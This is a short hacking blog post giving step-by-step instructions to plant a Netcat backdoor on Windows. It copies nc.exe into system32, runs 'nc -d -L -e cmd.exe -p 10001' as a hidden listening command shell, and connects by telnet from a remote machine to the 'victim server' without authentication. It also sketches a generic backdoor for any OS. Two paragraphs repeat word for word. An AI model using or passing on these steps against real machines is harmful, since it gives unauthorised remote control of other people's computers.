Here is a easy way to make a backdoor n also to hack a computer via that backdoor...
Many peoplethink of Netcat as the Swiss army knife of TCP/IP. Although often usedfor nefarious purposes, Netcat can also be used for good. Using Netcatwe can easily create a backdoor to any machine running Windows. All you have to do is perform the following steps:
Netcat is an excellent tool but is all too often used maliciously. Virus software often reports Netcat as a threat.
Many peoplethink of Netcat as the Swiss army knife of TCP/IP. Although often usedfor nefarious purposes, Netcat can also be used for good. Using Netcatwe can easily create a backdoor to any machine running Windows. All you have to do is perform the following steps:
- Download Netcat for Windows.
- Unzip nc.exe to the %SYSTEMROOT%\system32 directory.
- # Execute nc -d -L -e cmd.exe -p 10001. Change 10001 to which ever port you wish.
- From any remote machine accessible to the victim server — you cannow telnet to the server on port 10001 — telnet X.X.X.X 10001 — withoutany authentication.
Netcat is an excellent tool but is all too often used maliciously. Virus software often reports Netcat as a threat.
The Universal Way
How to create a back door on any OS:- Get root/administrator access.
- Install any program that lets you run commands remotely.
0 comments:
Post a Comment